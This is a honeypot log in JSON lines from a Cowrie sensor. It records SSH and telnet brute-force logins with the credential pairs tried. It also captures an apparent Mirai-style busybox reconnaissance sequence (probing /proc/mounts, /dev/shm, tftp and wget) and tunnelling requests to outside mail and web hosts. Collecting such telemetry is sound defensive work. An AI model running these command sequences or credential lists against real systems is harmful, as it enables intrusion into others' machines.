{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:11:38.869271Z","src_ip":"212.227.235.229","session":"6011e996c504"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45623,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef2a5f20862a","protocol":"ssh","message":"New connection: 212.227.125.160:45623 (1.2.3.4:22) [session: ef2a5f20862a]","sensor":"my-vps","timestamp":"2025-08-28T19:13:33.327841Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:13:33.329266Z","src_ip":"212.227.125.160","session":"ef2a5f20862a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45889,"dst_ip":"1.2.3.4","dst_port":22,"session":"608918b2d847","protocol":"ssh","message":"New connection: 212.227.125.160:45889 (1.2.3.4:22) [session: 608918b2d847]","sensor":"my-vps","timestamp":"2025-08-28T19:13:33.443406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:13:33.444107Z","src_ip":"212.227.125.160","session":"608918b2d847"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T19:13:33.560491Z","src_ip":"212.227.125.160","session":"608918b2d847"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:13:33.911120Z","src_ip":"212.227.125.160","session":"608918b2d847"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T19:13:34.028324Z","session":"608918b2d847"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33573,"dst_ip":"1.2.3.4","dst_port":23,"session":"47014e581e78","protocol":"telnet","message":"New connection: 212.227.125.160:33573 (1.2.3.4:23) [session: 47014e581e78]","sensor":"my-vps","timestamp":"2025-08-28T19:14:37.972042Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"meinsm","message":"login attempt [admin/meinsm] failed","sensor":"my-vps","timestamp":"2025-08-28T19:14:38.699344Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"1234","message":"login attempt [administrator/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T19:14:39.427636Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.login.success","username":"root","password":"zsun1188","message":"login attempt [root/zsun1188] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.155420Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:14:40.173605Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.403825Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.405336Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.405969Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.406748Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.407584Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.408683Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox IRCFT","message":"CMD: cat /proc/mounts; /bin/busybox IRCFT","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.639439Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox IRCFT","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox IRCFT","sensor":"my-vps","timestamp":"2025-08-28T19:14:40.872635Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox IRCFT","message":"CMD: tftp; wget; /bin/busybox IRCFT","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.104523Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.338091Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.340655Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"/bin/busybox IRCFT","message":"CMD: /bin/busybox IRCFT","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.571704Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.574064Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.575734Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.576436Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/92ff5a2e9d71f8ffcf6c76e124c707db3a552a217bc54a77ee84e1a5ebb94129","size":3550,"shasum":"92ff5a2e9d71f8ffcf6c76e124c707db3a552a217bc54a77ee84e1a5ebb94129","duplicate":false,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/92ff5a2e9d71f8ffcf6c76e124c707db3a552a217bc54a77ee84e1a5ebb94129 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.577862Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.session.closed","duration":3.609574794769287,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:14:41.581784Z","src_ip":"212.227.125.160","session":"47014e581e78"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:14:43.443598Z","src_ip":"212.227.125.160","session":"608918b2d847"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25216,"dst_ip":"1.2.3.4","dst_port":22,"session":"e344d3240d23","protocol":"ssh","message":"New connection: 212.227.125.160:25216 (1.2.3.4:22) [session: e344d3240d23]","sensor":"my-vps","timestamp":"2025-08-28T19:14:55.043231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:14:55.044445Z","src_ip":"212.227.125.160","session":"e344d3240d23"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:14:55.125119Z","src_ip":"212.227.125.160","session":"e344d3240d23"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@123","message":"login attempt [root/admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:14:55.839152Z","src_ip":"212.227.125.160","session":"e344d3240d23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T19:14:55.934870Z","session":"e344d3240d23"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T19:14:56.030037Z","src_ip":"212.227.125.160","session":"e344d3240d23"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:14:56.112483Z","src_ip":"212.227.125.160","session":"e344d3240d23"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63202,"dst_ip":"1.2.3.4","dst_port":22,"session":"27b83a61fbc0","protocol":"ssh","message":"New connection: 217.72.205.35:63202 (1.2.3.4:22) [session: 27b83a61fbc0]","sensor":"my-vps","timestamp":"2025-08-28T19:15:04.528651Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:15:04.530224Z","src_ip":"217.72.205.35","session":"27b83a61fbc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39424,"dst_ip":"1.2.3.4","dst_port":22,"session":"a170fad74538","protocol":"ssh","message":"New connection: 212.227.125.160:39424 (1.2.3.4:22) [session: a170fad74538]","sensor":"my-vps","timestamp":"2025-08-28T19:16:48.079420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:16:48.080391Z","src_ip":"212.227.125.160","session":"a170fad74538"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:16:48.130098Z","src_ip":"212.227.125.160","session":"a170fad74538"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:16:48.281953Z","src_ip":"212.227.125.160","session":"a170fad74538"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:16:49.334729Z","src_ip":"212.227.125.160","session":"a170fad74538"}
{"eventid":"cowrie.session.connect","src_ip":"180.100.216.109","src_port":39944,"dst_ip":"1.2.3.4","dst_port":23,"session":"64aa336a4176","protocol":"telnet","message":"New connection: 180.100.216.109:39944 (1.2.3.4:23) [session: 64aa336a4176]","sensor":"my-vps","timestamp":"2025-08-28T19:17:14.195167Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36032,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd77f92401be","protocol":"ssh","message":"New connection: 212.227.235.229:36032 (1.2.3.4:22) [session: cd77f92401be]","sensor":"my-vps","timestamp":"2025-08-28T19:17:36.950305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:17:36.951500Z","src_ip":"212.227.235.229","session":"cd77f92401be"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-28T19:17:37.035889Z","src_ip":"212.227.235.229","session":"cd77f92401be"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:17:37.122159Z","src_ip":"212.227.235.229","session":"cd77f92401be"}
{"eventid":"cowrie.session.connect","src_ip":"172.232.245.182","src_port":49682,"dst_ip":"1.2.3.4","dst_port":23,"session":"8893767db261","protocol":"telnet","message":"New connection: 172.232.245.182:49682 (1.2.3.4:23) [session: 8893767db261]","sensor":"my-vps","timestamp":"2025-08-28T19:17:39.654346Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T19:17:40.637626Z","src_ip":"172.232.245.182","session":"8893767db261"}
{"eventid":"cowrie.session.closed","duration":2.998387575149536,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:17:42.652663Z","src_ip":"172.232.245.182","session":"8893767db261"}
{"eventid":"cowrie.session.connect","src_ip":"172.232.245.182","src_port":49690,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a451dbcd15c","protocol":"telnet","message":"New connection: 172.232.245.182:49690 (1.2.3.4:23) [session: 0a451dbcd15c]","sensor":"my-vps","timestamp":"2025-08-28T19:17:42.847592Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:17:43.550602Z","src_ip":"172.232.245.182","session":"0a451dbcd15c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:17:43.567827Z","src_ip":"172.232.245.182","session":"0a451dbcd15c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"2.9","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:17:46.454718Z","src_ip":"172.232.245.182","session":"0a451dbcd15c"}
{"eventid":"cowrie.session.closed","duration":3.611053466796875,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:17:46.458560Z","src_ip":"172.232.245.182","session":"0a451dbcd15c"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaSW","message":"login attempt [root/1qaSW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:18:17.040941Z","src_ip":"180.100.216.109","session":"64aa336a4176"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:18:17.057521Z","src_ip":"180.100.216.109","session":"64aa336a4176"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52484,"dst_ip":"1.2.3.4","dst_port":22,"session":"d61ff4fdb14e","protocol":"ssh","message":"New connection: 212.227.235.229:52484 (1.2.3.4:22) [session: d61ff4fdb14e]","sensor":"my-vps","timestamp":"2025-08-28T19:19:30.672005Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:19:30.851408Z","src_ip":"212.227.235.229","session":"d61ff4fdb14e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52486,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6ccf04a96e0","protocol":"ssh","message":"New connection: 212.227.235.229:52486 (1.2.3.4:22) [session: c6ccf04a96e0]","sensor":"my-vps","timestamp":"2025-08-28T19:19:31.027582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:19:31.028957Z","src_ip":"212.227.235.229","session":"c6ccf04a96e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T19:19:31.205614Z","src_ip":"212.227.235.229","session":"c6ccf04a96e0"}
{"eventid":"cowrie.login.success","username":"root","password":"git123","message":"login attempt [root/git123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:19:31.913885Z","src_ip":"212.227.235.229","session":"c6ccf04a96e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:19:32.282451Z","src_ip":"212.227.235.229","session":"c6ccf04a96e0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T19:19:32.283229Z","src_ip":"212.227.235.229","session":"c6ccf04a96e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:19:32.462697Z","src_ip":"212.227.235.229","session":"c6ccf04a96e0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:19:32.463928Z","src_ip":"212.227.235.229","session":"c6ccf04a96e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59275,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfb6ee589405","protocol":"telnet","message":"New connection: 212.227.125.160:59275 (1.2.3.4:23) [session: dfb6ee589405]","sensor":"my-vps","timestamp":"2025-08-28T19:20:05.685998Z"}
{"eventid":"cowrie.session.closed","duration":40.019697427749634,"message":"Connection lost after 40 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:20:45.705601Z","src_ip":"212.227.125.160","session":"dfb6ee589405"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":49068,"dst_ip":"1.2.3.4","dst_port":22,"session":"443a4ae5f0db","protocol":"ssh","message":"New connection: 77.90.185.47:49068 (1.2.3.4:22) [session: 443a4ae5f0db]","sensor":"my-vps","timestamp":"2025-08-28T19:20:56.251329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:20:56.401511Z","src_ip":"77.90.185.47","session":"443a4ae5f0db"}
